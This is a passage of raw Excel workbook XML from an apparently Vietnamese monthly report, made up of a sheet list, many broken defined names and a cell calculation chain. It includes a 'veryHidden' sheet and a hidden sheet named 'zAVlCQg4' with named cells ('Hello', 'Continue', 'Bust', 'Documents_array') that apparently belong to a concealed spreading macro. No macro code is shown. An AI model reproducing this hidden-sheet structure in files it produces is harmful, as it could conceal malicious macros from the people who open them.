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C:\Users\Admin\Desktop\Bc tháng 11\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" tabRatio="726" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="foxz" sheetId="43" state="veryHidden" r:id="rId1"/>
    <sheet name="Phụ biểu" sheetId="44" r:id="rId2"/>
    <sheet name="zAVlCQg4" sheetId="9" state="hidden" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_1">#N/A</definedName>
    <definedName name="_1000A01">#N/A</definedName>
    <definedName name="_2">#N/A</definedName>
    <definedName name="_Builtin0">zAVlCQg4!$C$4</definedName>
    <definedName name="_CON1" localSheetId="1">#REF!</definedName>
    <definedName name="_CON1" localSheetId="2">#REF!</definedName>
    <definedName name="_CON1">#REF!</definedName>
    <definedName name="_CON2" localSheetId="1">#REF!</definedName>
    <definedName name="_CON2" localSheetId="2">#REF!</definedName>
    <definedName name="_CON2">#REF!</definedName>
    <definedName name="_Fill" localSheetId="1" hidden="1">#REF!</definedName>
    <definedName name="_Fill" localSheetId="2" hidden="1">#REF!</definedName>
    <definedName name="_Fill" hidden="1">#REF!</definedName>
    <definedName name="_Key1" localSheetId="1" hidden="1">#REF!</definedName>
    <definedName name="_Key1" hidden="1">#REF!</definedName>
    <definedName name="_Key2" localSheetId="1" hidden="1">#REF!</definedName>
    <definedName name="_Key2" hidden="1">#REF!</definedName>
    <definedName name="_lap1" localSheetId="1">#REF!</definedName>
    <definedName name="_lap1" localSheetId="2">#REF!</definedName>
    <definedName name="_lap1">#REF!</definedName>
    <definedName name="_lap2" localSheetId="1">#REF!</definedName>
    <definedName name="_lap2" localSheetId="2">#REF!</definedName>
    <definedName name="_lap2">#REF!</definedName>
    <definedName name="_NET2" localSheetId="1">#REF!</definedName>
    <definedName name="_NET2">#REF!</definedName>
    <definedName name="_Order1" hidden="1">255</definedName>
    <definedName name="_Order2" hidden="1">255</definedName>
    <definedName name="_Sort" localSheetId="1" hidden="1">#REF!</definedName>
    <definedName name="_Sort" hidden="1">#REF!</definedName>
    <definedName name="A01_">#N/A</definedName>
    <definedName name="A01AC">#N/A</definedName>
    <definedName name="A01CAT">#N/A</definedName>
    <definedName name="A01CODE">#N/A</definedName>
    <definedName name="A01DATA">#N/A</definedName>
    <definedName name="A01MI">#N/A</definedName>
    <definedName name="A01TO">#N/A</definedName>
    <definedName name="AA" localSheetId="1">#REF!</definedName>
    <definedName name="AA" localSheetId="2">#REF!</definedName>
    <definedName name="AA">#REF!</definedName>
    <definedName name="All_Item" localSheetId="1">#REF!</definedName>
    <definedName name="All_Item" localSheetId="2">#REF!</definedName>
    <definedName name="All_Item">#REF!</definedName>
    <definedName name="ALPIN">#N/A</definedName>
    <definedName name="ALPJYOU">#N/A</definedName>
    <definedName name="ALPTOI">#N/A</definedName>
    <definedName name="BB" localSheetId="1">#REF!</definedName>
    <definedName name="BB" localSheetId="2">#REF!</definedName>
    <definedName name="BB">#REF!</definedName>
    <definedName name="BOQ" localSheetId="1">#REF!</definedName>
    <definedName name="BOQ" localSheetId="2">#REF!</definedName>
    <definedName name="BOQ">#REF!</definedName>
    <definedName name="Bust">zAVlCQg4!$C$31</definedName>
    <definedName name="BVCISUMMARY" localSheetId="1">#REF!</definedName>
    <definedName name="BVCISUMMARY" localSheetId="2">#REF!</definedName>
    <definedName name="BVCISUMMARY">#REF!</definedName>
    <definedName name="cap" localSheetId="1">#REF!</definedName>
    <definedName name="cap" localSheetId="2">#REF!</definedName>
    <definedName name="cap">#REF!</definedName>
    <definedName name="cap0.7" localSheetId="1">#REF!</definedName>
    <definedName name="cap0.7" localSheetId="2">#REF!</definedName>
    <definedName name="cap0.7">#REF!</definedName>
    <definedName name="Category_All" localSheetId="1">#REF!</definedName>
    <definedName name="Category_All" localSheetId="2">#REF!</definedName>
    <definedName name="Category_All">#REF!</definedName>
    <definedName name="CATIN">#N/A</definedName>
    <definedName name="CATJYOU">#N/A</definedName>
    <definedName name="CATREC">#N/A</definedName>
    <definedName name="CATSYU">#N/A</definedName>
    <definedName name="CL" localSheetId="1">#REF!</definedName>
    <definedName name="CL" localSheetId="2">#REF!</definedName>
    <definedName name="CL">#REF!</definedName>
    <definedName name="COMMON" localSheetId="1">#REF!</definedName>
    <definedName name="COMMON">#REF!</definedName>
    <definedName name="CON_EQP_COS" localSheetId="1">#REF!</definedName>
    <definedName name="CON_EQP_COS" localSheetId="2">#REF!</definedName>
    <definedName name="CON_EQP_COS">#REF!</definedName>
    <definedName name="CON_EQP_COST" localSheetId="1">#REF!</definedName>
    <definedName name="CON_EQP_COST" localSheetId="2">#REF!</definedName>
    <definedName name="CON_EQP_COST">#REF!</definedName>
    <definedName name="CONST_EQ" localSheetId="1">#REF!</definedName>
    <definedName name="CONST_EQ" localSheetId="2">#REF!</definedName>
    <definedName name="CONST_EQ">#REF!</definedName>
    <definedName name="Continue">zAVlCQg4!$C$9</definedName>
    <definedName name="COVER" localSheetId="1">#REF!</definedName>
    <definedName name="COVER" localSheetId="2">#REF!</definedName>
    <definedName name="COVER">#REF!</definedName>
    <definedName name="CRITINST" localSheetId="1">#REF!</definedName>
    <definedName name="CRITINST" localSheetId="2">#REF!</definedName>
    <definedName name="CRITINST">#REF!</definedName>
    <definedName name="CRITPURC" localSheetId="1">#REF!</definedName>
    <definedName name="CRITPURC" localSheetId="2">#REF!</definedName>
    <definedName name="CRITPURC">#REF!</definedName>
    <definedName name="CS_10" localSheetId="1">#REF!</definedName>
    <definedName name="CS_10" localSheetId="2">#REF!</definedName>
    <definedName name="CS_10">#REF!</definedName>
    <definedName name="CS_100" localSheetId="1">#REF!</definedName>
    <definedName name="CS_100" localSheetId="2">#REF!</definedName>
    <definedName name="CS_100">#REF!</definedName>
    <definedName name="CS_10S" localSheetId="1">#REF!</definedName>
    <definedName name="CS_10S" localSheetId="2">#REF!</definedName>
    <definedName name="CS_10S">#REF!</definedName>
    <definedName name="CS_120" localSheetId="1">#REF!</definedName>
    <definedName name="CS_120" localSheetId="2">#REF!</definedName>
    <definedName name="CS_120">#REF!</definedName>
    <definedName name="CS_140" localSheetId="1">#REF!</definedName>
    <definedName name="CS_140" localSheetId="2">#REF!</definedName>
    <definedName name="CS_140">#REF!</definedName>
    <definedName name="CS_160" localSheetId="1">#REF!</definedName>
    <definedName name="CS_160" localSheetId="2">#REF!</definedName>
    <definedName name="CS_160">#REF!</definedName>
    <definedName name="CS_20" localSheetId="1">#REF!</definedName>
    <definedName name="CS_20" localSheetId="2">#REF!</definedName>
    <definedName name="CS_20">#REF!</definedName>
    <definedName name="CS_30" localSheetId="1">#REF!</definedName>
    <definedName name="CS_30" localSheetId="2">#REF!</definedName>
    <definedName name="CS_30">#REF!</definedName>
    <definedName name="CS_40" localSheetId="1">#REF!</definedName>
    <definedName name="CS_40" localSheetId="2">#REF!</definedName>
    <definedName name="CS_40">#REF!</definedName>
    <definedName name="CS_40S" localSheetId="1">#REF!</definedName>
    <definedName name="CS_40S" localSheetId="2">#REF!</definedName>
    <definedName name="CS_40S">#REF!</definedName>
    <definedName name="CS_5S" localSheetId="1">#REF!</definedName>
    <definedName name="CS_5S" localSheetId="2">#REF!</definedName>
    <definedName name="CS_5S">#REF!</definedName>
    <definedName name="CS_60" localSheetId="1">#REF!</definedName>
    <definedName name="CS_60" localSheetId="2">#REF!</definedName>
    <definedName name="CS_60">#REF!</definedName>
    <definedName name="CS_80" localSheetId="1">#REF!</definedName>
    <definedName name="CS_80" localSheetId="2">#REF!</definedName>
    <definedName name="CS_80">#REF!</definedName>
    <definedName name="CS_80S" localSheetId="1">#REF!</definedName>
    <definedName name="CS_80S" localSheetId="2">#REF!</definedName>
    <definedName name="CS_80S">#REF!</definedName>
    <definedName name="CS_STD" localSheetId="1">#REF!</definedName>
    <definedName name="CS_STD" localSheetId="2">#REF!</definedName>
    <definedName name="CS_STD">#REF!</definedName>
    <definedName name="CS_XS" localSheetId="1">#REF!</definedName>
    <definedName name="CS_XS" localSheetId="2">#REF!</definedName>
    <definedName name="CS_XS">#REF!</definedName>
    <definedName name="CS_XXS" localSheetId="1">#REF!</definedName>
    <definedName name="CS_XXS" localSheetId="2">#REF!</definedName>
    <definedName name="CS_XXS">#REF!</definedName>
    <definedName name="CT" localSheetId="1">#REF!</definedName>
    <definedName name="CT" localSheetId="2">#REF!</definedName>
    <definedName name="CT">#REF!</definedName>
    <definedName name="ctdn9697" localSheetId="1">#REF!</definedName>
    <definedName name="ctdn9697" localSheetId="2">#REF!</definedName>
    <definedName name="ctdn9697">#REF!</definedName>
    <definedName name="CURRENCY" localSheetId="1">#REF!</definedName>
    <definedName name="CURRENCY" localSheetId="2">#REF!</definedName>
    <definedName name="CURRENCY">#REF!</definedName>
    <definedName name="D_7101A_B" localSheetId="1">#REF!</definedName>
    <definedName name="D_7101A_B" localSheetId="2">#REF!</definedName>
    <definedName name="D_7101A_B">#REF!</definedName>
    <definedName name="DG" localSheetId="1">#REF!</definedName>
    <definedName name="DG" localSheetId="2">#REF!</definedName>
    <definedName name="DG">#REF!</definedName>
    <definedName name="dobt" localSheetId="1">#REF!</definedName>
    <definedName name="dobt" localSheetId="2">#REF!</definedName>
    <definedName name="dobt">#REF!</definedName>
    <definedName name="Document_array" localSheetId="2">{"ÿÿÿÿÿ","BC Tong ket nam 2008 &amp; KH nam 2009.xls","BC thang 12 nam 2008.xls"}</definedName>
    <definedName name="Documents_array">zAVlCQg4!$B$1:$B$16</definedName>
    <definedName name="DSUMDATA" localSheetId="1">#REF!</definedName>
    <definedName name="DSUMDATA" localSheetId="2">#REF!</definedName>
    <definedName name="DSUMDATA">#REF!</definedName>
    <definedName name="End_1" localSheetId="1">#REF!</definedName>
    <definedName name="End_1" localSheetId="2">#REF!</definedName>
    <definedName name="End_1">#REF!</definedName>
    <definedName name="End_10" localSheetId="1">#REF!</definedName>
    <definedName name="End_10" localSheetId="2">#REF!</definedName>
    <definedName name="End_10">#REF!</definedName>
    <definedName name="End_11" localSheetId="1">#REF!</definedName>
    <definedName name="End_11" localSheetId="2">#REF!</definedName>
    <definedName name="End_11">#REF!</definedName>
    <definedName name="End_12" localSheetId="1">#REF!</definedName>
    <definedName name="End_12" localSheetId="2">#REF!</definedName>
    <definedName name="End_12">#REF!</definedName>
    <definedName name="End_13" localSheetId="1">#REF!</definedName>
    <definedName name="End_13" localSheetId="2">#REF!</definedName>
    <definedName name="End_13">#REF!</definedName>
    <definedName name="End_2" localSheetId="1">#REF!</definedName>
    <definedName name="End_2" localSheetId="2">#REF!</definedName>
    <definedName name="End_2">#REF!</definedName>
    <definedName name="End_3" localSheetId="1">#REF!</definedName>
    <definedName name="End_3" localSheetId="2">#REF!</definedName>
    <definedName name="End_3">#REF!</definedName>
    <definedName name="End_4" localSheetId="1">#REF!</definedName>
    <definedName name="End_4" localSheetId="2">#REF!</definedName>
    <definedName name="End_4">#REF!</definedName>
    <definedName name="End_5" localSheetId="1">#REF!</definedName>
    <definedName name="End_5" localSheetId="2">#REF!</definedName>
    <definedName name="End_5">#REF!</definedName>
    <definedName name="End_6" localSheetId="1">#REF!</definedName>
    <definedName name="End_6" localSheetId="2">#REF!</definedName>
    <definedName name="End_6">#REF!</definedName>
    <definedName name="End_7" localSheetId="1">#REF!</definedName>
    <definedName name="End_7" localSheetId="2">#REF!</definedName>
    <definedName name="End_7">#REF!</definedName>
    <definedName name="End_8" localSheetId="1">#REF!</definedName>
    <definedName name="End_8" localSheetId="2">#REF!</definedName>
    <definedName name="End_8">#REF!</definedName>
    <definedName name="End_9" localSheetId="1">#REF!</definedName>
    <definedName name="End_9" localSheetId="2">#REF!</definedName>
    <definedName name="End_9">#REF!</definedName>
    <definedName name="FACTOR" localSheetId="1">#REF!</definedName>
    <definedName name="FACTOR" localSheetId="2">#REF!</definedName>
    <definedName name="FACTOR">#REF!</definedName>
    <definedName name="Hello">zAVlCQg4!$A$15</definedName>
    <definedName name="HOME_MANP" localSheetId="1">#REF!</definedName>
    <definedName name="HOME_MANP">#REF!</definedName>
    <definedName name="HOMEOFFICE_COST" localSheetId="1">#REF!</definedName>
    <definedName name="HOMEOFFICE_COST">#REF!</definedName>
    <definedName name="HTML_CodePage" hidden="1">950</definedName>
    <definedName name="HTML_Control" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="HTML_Control" localSheetId="2" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="HTML_Control" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="HTML_Description" hidden="1">""</definedName>
    <definedName name="HTML_Email" hidden="1">""</definedName>
    <definedName name="HTML_Header" hidden="1">"Sheet1"</definedName>
    <definedName name="HTML_LastUpdate" hidden="1">"2000/9/14"</definedName>
    <definedName name="HTML_LineAfter" hidden="1">FALSE</definedName>
    <definedName name="HTML_LineBefore" hidden="1">FALSE</definedName>
    <definedName name="HTML_Name" hidden="1">"J.C.WONG"</definedName>
    <definedName name="HTML_OBDlg2" hidden="1">TRUE</definedName>
    <definedName name="HTML_OBDlg4" hidden="1">TRUE</definedName>
    <definedName name="HTML_OS" hidden="1">0</definedName>
    <definedName name="HTML_PathFile" hidden="1">"C:\2689\Q\國內\00q3961台化龍德PTA3建造\MyHTML.htm"</definedName>
    <definedName name="HTML_Title" hidden="1">"00Q3961-SUM"</definedName>
    <definedName name="IDLAB_COST" localSheetId="1">#REF!</definedName>
    <definedName name="IDLAB_COST" localSheetId="2">#REF!</definedName>
    <definedName name="IDLAB_COST">#REF!</definedName>
    <definedName name="IND_LAB" localSheetId="1">#REF!</definedName>
    <definedName name="IND_LAB" localSheetId="2">#REF!</definedName>
    <definedName name="IND_LAB">#REF!</definedName>
    <definedName name="INDMANP" localSheetId="1">#REF!</definedName>
    <definedName name="INDMANP" localSheetId="2">#REF!</definedName>
    <definedName name="INDMANP">#REF!</definedName>
    <definedName name="K" localSheetId="1">#REF!</definedName>
    <definedName name="K" localSheetId="2">#REF!</definedName>
    <definedName name="K">#REF!</definedName>
    <definedName name="KVC" localSheetId="1">#REF!</definedName>
    <definedName name="KVC" localSheetId="2">#REF!</definedName>
    <definedName name="KVC">#REF!</definedName>
    <definedName name="L" localSheetId="1">#REF!</definedName>
    <definedName name="L" localSheetId="2">#REF!</definedName>
    <definedName name="L">#REF!</definedName>
    <definedName name="lVC" localSheetId="1">#REF!</definedName>
    <definedName name="lVC" localSheetId="2">#REF!</definedName>
    <definedName name="lVC">#REF!</definedName>
    <definedName name="MAJ_CON_EQP" localSheetId="1">#REF!</definedName>
    <definedName name="MAJ_CON_EQP" localSheetId="2">#REF!</definedName>
    <definedName name="MAJ_CON_EQP">#REF!</definedName>
    <definedName name="MG_A" localSheetId="1">#REF!</definedName>
    <definedName name="MG_A" localSheetId="2">#REF!</definedName>
    <definedName name="MG_A">#REF!</definedName>
    <definedName name="NCcap0.7" localSheetId="1">#REF!</definedName>
    <definedName name="NCcap0.7" localSheetId="2">#REF!</definedName>
    <definedName name="NCcap0.7">#REF!</definedName>
    <definedName name="NCcap1" localSheetId="1">#REF!</definedName>
    <definedName name="NCcap1" localSheetId="2">#REF!</definedName>
    <definedName name="NCcap1">#REF!</definedName>
    <definedName name="NET" localSheetId="1">#REF!</definedName>
    <definedName name="NET" localSheetId="2">#REF!</definedName>
    <definedName name="NET">#REF!</definedName>
    <definedName name="NET_1" localSheetId="1">#REF!</definedName>
    <definedName name="NET_1">#REF!</definedName>
    <definedName name="NET_ANA" localSheetId="1">#REF!</definedName>
    <definedName name="NET_ANA" localSheetId="2">#REF!</definedName>
    <definedName name="NET_ANA">#REF!</definedName>
    <definedName name="NET_ANA_1" localSheetId="1">#REF!</definedName>
    <definedName name="NET_ANA_1">#REF!</definedName>
    <definedName name="NET_ANA_2" localSheetId="1">#REF!</definedName>
    <definedName name="NET_ANA_2">#REF!</definedName>
    <definedName name="PRICE" localSheetId="1">#REF!</definedName>
    <definedName name="PRICE" localSheetId="2">#REF!</definedName>
    <definedName name="PRICE">#REF!</definedName>
    <definedName name="PRICE1" localSheetId="1">#REF!</definedName>
    <definedName name="PRICE1" localSheetId="2">#REF!</definedName>
    <definedName name="PRICE1">#REF!</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="1">'Phụ biểu'!$4:$5</definedName>
    <definedName name="Print_Titles_MI" localSheetId="1">#REF!</definedName>
    <definedName name="Print_Titles_MI" localSheetId="2">#REF!</definedName>
    <definedName name="Print_Titles_MI">#REF!</definedName>
    <definedName name="PRINTA" localSheetId="1">#REF!</definedName>
    <definedName name="PRINTA">#REF!</definedName>
    <definedName name="PRINTB" localSheetId="1">#REF!</definedName>
    <definedName name="PRINTB">#REF!</definedName>
    <definedName name="PRINTC" localSheetId="1">#REF!</definedName>
    <definedName name="PRINTC">#REF!</definedName>
    <definedName name="PROPOSAL" localSheetId="1">#REF!</definedName>
    <definedName name="PROPOSAL" localSheetId="2">#REF!</definedName>
    <definedName name="PROPOSAL">#REF!</definedName>
    <definedName name="RECOUT">#N/A</definedName>
    <definedName name="RFP003A" localSheetId="1">#REF!</definedName>
    <definedName name="RFP003A" localSheetId="2">#REF!</definedName>
    <definedName name="RFP003A">#REF!</definedName>
    <definedName name="RFP003B" localSheetId="1">#REF!</definedName>
    <definedName name="RFP003B" localSheetId="2">#REF!</definedName>
    <definedName name="RFP003B">#REF!</definedName>
    <definedName name="RFP003C" localSheetId="1">#REF!</definedName>
    <definedName name="RFP003C" localSheetId="2">#REF!</definedName>
    <definedName name="RFP003C">#REF!</definedName>
    <definedName name="RFP003D" localSheetId="1">#REF!</definedName>
    <definedName name="RFP003D" localSheetId="2">#REF!</definedName>
    <definedName name="RFP003D">#REF!</definedName>
    <definedName name="RFP003E" localSheetId="1">#REF!</definedName>
    <definedName name="RFP003E" localSheetId="2">#REF!</definedName>
    <definedName name="RFP003E">#REF!</definedName>
    <definedName name="RFP003F" localSheetId="1">#REF!</definedName>
    <definedName name="RFP003F" localSheetId="2">#REF!</definedName>
    <definedName name="RFP003F">#REF!</definedName>
    <definedName name="SCH" localSheetId="1">#REF!</definedName>
    <definedName name="SCH" localSheetId="2">#REF!</definedName>
    <definedName name="SCH">#REF!</definedName>
    <definedName name="SIZE" localSheetId="1">#REF!</definedName>
    <definedName name="SIZE" localSheetId="2">#REF!</definedName>
    <definedName name="SIZE">#REF!</definedName>
    <definedName name="SORT" localSheetId="1">#REF!</definedName>
    <definedName name="SORT" localSheetId="2">#REF!</definedName>
    <definedName name="SORT">#REF!</definedName>
    <definedName name="SPEC" localSheetId="1">#REF!</definedName>
    <definedName name="SPEC" localSheetId="2">#REF!</definedName>
    <definedName name="SPEC">#REF!</definedName>
    <definedName name="SPECSUMMARY" localSheetId="1">#REF!</definedName>
    <definedName name="SPECSUMMARY" localSheetId="2">#REF!</definedName>
    <definedName name="SPECSUMMARY">#REF!</definedName>
    <definedName name="Start_1" localSheetId="1">#REF!</definedName>
    <definedName name="Start_1" localSheetId="2">#REF!</definedName>
    <definedName name="Start_1">#REF!</definedName>
    <definedName name="Start_10" localSheetId="1">#REF!</definedName>
    <definedName name="Start_10" localSheetId="2">#REF!</definedName>
    <definedName name="Start_10">#REF!</definedName>
    <definedName name="Start_11" localSheetId="1">#REF!</definedName>
    <definedName name="Start_11" localSheetId="2">#REF!</definedName>
    <definedName name="Start_11">#REF!</definedName>
    <definedName name="Start_12" localSheetId="1">#REF!</definedName>
    <definedName name="Start_12" localSheetId="2">#REF!</definedName>
    <definedName name="Start_12">#REF!</definedName>
    <definedName name="Start_13" localSheetId="1">#REF!</definedName>
    <definedName name="Start_13" localSheetId="2">#REF!</definedName>
    <definedName name="Start_13">#REF!</definedName>
    <definedName name="Start_2" localSheetId="1">#REF!</definedName>
    <definedName name="Start_2" localSheetId="2">#REF!</definedName>
    <definedName name="Start_2">#REF!</definedName>
    <definedName name="Start_3" localSheetId="1">#REF!</definedName>
    <definedName name="Start_3" localSheetId="2">#REF!</definedName>
    <definedName name="Start_3">#REF!</definedName>
    <definedName name="Start_4" localSheetId="1">#REF!</definedName>
    <definedName name="Start_4" localSheetId="2">#REF!</definedName>
    <definedName name="Start_4">#REF!</definedName>
    <definedName name="Start_5" localSheetId="1">#REF!</definedName>
    <definedName name="Start_5" localSheetId="2">#REF!</definedName>
    <definedName name="Start_5">#REF!</definedName>
    <definedName name="Start_6" localSheetId="1">#REF!</definedName>
    <definedName name="Start_6" localSheetId="2">#REF!</definedName>
    <definedName name="Start_6">#REF!</definedName>
    <definedName name="Start_7" localSheetId="1">#REF!</definedName>
    <definedName name="Start_7" localSheetId="2">#REF!</definedName>
    <definedName name="Start_7">#REF!</definedName>
    <definedName name="Start_8" localSheetId="1">#REF!</definedName>
    <definedName name="Start_8" localSheetId="2">#REF!</definedName>
    <definedName name="Start_8">#REF!</definedName>
    <definedName name="Start_9" localSheetId="1">#REF!</definedName>
    <definedName name="Start_9" localSheetId="2">#REF!</definedName>
    <definedName name="Start_9">#REF!</definedName>
    <definedName name="SUMMARY" localSheetId="1">#REF!</definedName>
    <definedName name="SUMMARY">#REF!</definedName>
    <definedName name="THI" localSheetId="1">#REF!</definedName>
    <definedName name="THI">#REF!</definedName>
    <definedName name="TITAN" localSheetId="1">#REF!</definedName>
    <definedName name="TITAN">#REF!</definedName>
    <definedName name="TPLRP" localSheetId="1">#REF!</definedName>
    <definedName name="TPLRP" localSheetId="2">#REF!</definedName>
    <definedName name="TPLRP">#REF!</definedName>
    <definedName name="TRADE2" localSheetId="1">#REF!</definedName>
    <definedName name="TRADE2" localSheetId="2">#REF!</definedName>
    <definedName name="TRADE2">#REF!</definedName>
    <definedName name="ttbt" localSheetId="1">#REF!</definedName>
    <definedName name="ttbt" localSheetId="2">#REF!</definedName>
    <definedName name="ttbt">#REF!</definedName>
    <definedName name="VARIINST" localSheetId="1">#REF!</definedName>
    <definedName name="VARIINST" localSheetId="2">#REF!</definedName>
    <definedName name="VARIINST">#REF!</definedName>
    <definedName name="VARIPURC" localSheetId="1">#REF!</definedName>
    <definedName name="VARIPURC" localSheetId="2">#REF!</definedName>
    <definedName name="VARIPURC">#REF!</definedName>
    <definedName name="vccot" localSheetId="1">#REF!</definedName>
    <definedName name="vccot" localSheetId="2">#REF!</definedName>
    <definedName name="vccot">#REF!</definedName>
    <definedName name="vctb" localSheetId="1">#REF!</definedName>
    <definedName name="vctb" localSheetId="2">#REF!</definedName>
    <definedName name="vctb">#REF!</definedName>
    <definedName name="Vlcap0.7" localSheetId="1">#REF!</definedName>
    <definedName name="Vlcap0.7" localSheetId="2">#REF!</definedName>
    <definedName name="Vlcap0.7">#REF!</definedName>
    <definedName name="VLcap1" localSheetId="1">#REF!</definedName>
    <definedName name="VLcap1" localSheetId="2">#REF!</definedName>
    <definedName name="VLcap1">#REF!</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O70" i="44" l="1"/>
  <c r="M151" i="44"/>
  <c r="M149" i="44" s="1"/>
  <c r="M150" i="44"/>
  <c r="M153" i="44"/>
  <c r="M156" i="44"/>
  <c r="M142" i="44"/>
  <c r="M141" i="44" s="1"/>
  <c r="M114" i="44"/>
  <c r="M113" i="44" s="1"/>
  <c r="M106" i="44"/>
  <c r="M78" i="44" s="1"/>
  <c r="M94" i="44"/>
  <c r="M87" i="44"/>
  <c r="M68" i="44"/>
  <c r="M59" i="44"/>
  <c r="M66" i="44"/>
  <c r="M62" i="44"/>
  <c r="M50" i="44"/>
  <c r="M38" i="44"/>
  <c r="M37" i="44" s="1"/>
  <c r="M36" i="44"/>
  <c r="M44" i="44"/>
  <c r="M18" i="44"/>
  <c r="M21" i="44"/>
  <c r="AM90" i="44" l="1"/>
  <c r="AM112" i="44"/>
  <c r="AM56" i="44"/>
  <c r="AK112" i="44"/>
  <c r="AJ56" i="44"/>
  <c r="AG56" i="44"/>
  <c r="AH70" i="44"/>
  <c r="AD56" i="44"/>
  <c r="AA112" i="44"/>
  <c r="W112" i="44"/>
  <c r="R112" i="44"/>
  <c r="S147" i="44"/>
  <c r="S146" i="44"/>
  <c r="S145" i="44"/>
  <c r="S144" i="44"/>
  <c r="S143" i="44"/>
  <c r="S75" i="44"/>
  <c r="S70" i="44"/>
  <c r="S43" i="44"/>
  <c r="S28" i="44"/>
  <c r="K56" i="44"/>
  <c r="J56" i="44"/>
  <c r="I56" i="44"/>
  <c r="H56" i="44"/>
  <c r="G56" i="44"/>
  <c r="V81" i="44"/>
  <c r="AM81" i="44"/>
  <c r="Z81" i="44"/>
  <c r="AG81" i="44"/>
  <c r="AJ81" i="44"/>
  <c r="AD92" i="44"/>
  <c r="AK56" i="44" l="1"/>
  <c r="AH56" i="44"/>
  <c r="AE56" i="44"/>
  <c r="Z56" i="44" l="1"/>
  <c r="V56" i="44"/>
  <c r="AL154" i="44" l="1"/>
  <c r="AF154" i="44"/>
  <c r="AB154" i="44"/>
  <c r="X154" i="44"/>
  <c r="T154" i="44"/>
  <c r="AM80" i="44" l="1"/>
  <c r="AM84" i="44"/>
  <c r="AJ80" i="44" l="1"/>
  <c r="Z91" i="44" l="1"/>
  <c r="AJ84" i="44" l="1"/>
  <c r="O84" i="44" s="1"/>
  <c r="O96" i="44" l="1"/>
  <c r="O103" i="44" l="1"/>
  <c r="O104" i="44"/>
  <c r="O105" i="44"/>
  <c r="O102" i="44"/>
  <c r="AD91" i="44" l="1"/>
  <c r="S112" i="44" l="1"/>
  <c r="O154" i="44" l="1"/>
  <c r="AO120" i="44" l="1"/>
  <c r="AO121" i="44"/>
  <c r="AO124" i="44"/>
  <c r="AO126" i="44"/>
  <c r="AO127" i="44"/>
  <c r="AO128" i="44"/>
  <c r="AP64" i="44" l="1"/>
  <c r="AP69" i="44"/>
  <c r="AP124" i="44"/>
  <c r="AP126" i="44"/>
  <c r="AP127" i="44"/>
  <c r="AP128" i="44"/>
  <c r="M24" i="44"/>
  <c r="M16" i="44" s="1"/>
  <c r="M17" i="44" l="1"/>
  <c r="M40" i="44"/>
  <c r="M14" i="44" l="1"/>
  <c r="M13" i="44" s="1"/>
  <c r="O119" i="44"/>
  <c r="AM99" i="44"/>
  <c r="O118" i="44" l="1"/>
  <c r="R24" i="44"/>
  <c r="S24" i="44" s="1"/>
  <c r="O101" i="44"/>
  <c r="AP101" i="44" s="1"/>
  <c r="N102" i="44"/>
  <c r="T100" i="44"/>
  <c r="V100" i="44"/>
  <c r="X100" i="44"/>
  <c r="Z100" i="44"/>
  <c r="AB100" i="44"/>
  <c r="AD100" i="44"/>
  <c r="AF100" i="44"/>
  <c r="AG100" i="44"/>
  <c r="AI100" i="44"/>
  <c r="AJ100" i="44"/>
  <c r="AL100" i="44"/>
  <c r="AM100" i="44"/>
  <c r="R100" i="44"/>
  <c r="N32" i="44"/>
  <c r="AD80" i="44"/>
  <c r="O99" i="44" l="1"/>
  <c r="AP105" i="44"/>
  <c r="AP104" i="44"/>
  <c r="AP103" i="44"/>
  <c r="AO102" i="44"/>
  <c r="AP102" i="44"/>
  <c r="O100" i="44"/>
  <c r="AD75" i="44"/>
  <c r="V75" i="44"/>
  <c r="AJ65" i="44"/>
  <c r="AG65" i="44"/>
  <c r="AD65" i="44"/>
  <c r="Z65" i="44"/>
  <c r="V65" i="44"/>
  <c r="R65" i="44"/>
  <c r="S65" i="44" s="1"/>
  <c r="O52" i="44"/>
  <c r="O32" i="44"/>
  <c r="R20" i="44"/>
  <c r="AM61" i="44"/>
  <c r="AJ61" i="44"/>
  <c r="AG61" i="44"/>
  <c r="AD61" i="44"/>
  <c r="Z61" i="44"/>
  <c r="V61" i="44"/>
  <c r="R61" i="44"/>
  <c r="AM20" i="44"/>
  <c r="AM22" i="44" s="1"/>
  <c r="AJ20" i="44"/>
  <c r="AD20" i="44"/>
  <c r="Z20" i="44"/>
  <c r="AP52" i="44" l="1"/>
  <c r="AP32" i="44"/>
  <c r="AP100" i="44"/>
  <c r="T56" i="44"/>
  <c r="P56" i="44"/>
  <c r="AP70" i="44" l="1"/>
  <c r="Z45" i="44"/>
  <c r="O43" i="44"/>
  <c r="AG36" i="44"/>
  <c r="AD36" i="44"/>
  <c r="R36" i="44"/>
  <c r="S36" i="44" s="1"/>
  <c r="O20" i="44"/>
  <c r="N117" i="44"/>
  <c r="N116" i="44"/>
  <c r="AL115" i="44"/>
  <c r="AL114" i="44" s="1"/>
  <c r="AI115" i="44"/>
  <c r="AI114" i="44" s="1"/>
  <c r="AF115" i="44"/>
  <c r="AF114" i="44" s="1"/>
  <c r="AB115" i="44"/>
  <c r="AB114" i="44" s="1"/>
  <c r="X115" i="44"/>
  <c r="X114" i="44" s="1"/>
  <c r="T115" i="44"/>
  <c r="T114" i="44" s="1"/>
  <c r="P115" i="44"/>
  <c r="P114" i="44" s="1"/>
  <c r="N20" i="44"/>
  <c r="N28" i="44"/>
  <c r="N39" i="44"/>
  <c r="N43" i="44"/>
  <c r="N47" i="44"/>
  <c r="N52" i="44"/>
  <c r="N61" i="44"/>
  <c r="N65" i="44"/>
  <c r="N75" i="44"/>
  <c r="N81" i="44"/>
  <c r="N80" i="44"/>
  <c r="N92" i="44"/>
  <c r="P129" i="44"/>
  <c r="R129" i="44"/>
  <c r="T129" i="44"/>
  <c r="V129" i="44"/>
  <c r="X129" i="44"/>
  <c r="Z129" i="44"/>
  <c r="AB129" i="44"/>
  <c r="AD129" i="44"/>
  <c r="AF129" i="44"/>
  <c r="AG129" i="44"/>
  <c r="AI129" i="44"/>
  <c r="AJ129" i="44"/>
  <c r="AL129" i="44"/>
  <c r="AM129" i="44"/>
  <c r="O137" i="44"/>
  <c r="AP137" i="44" s="1"/>
  <c r="O138" i="44"/>
  <c r="O139" i="44"/>
  <c r="AP139" i="44" s="1"/>
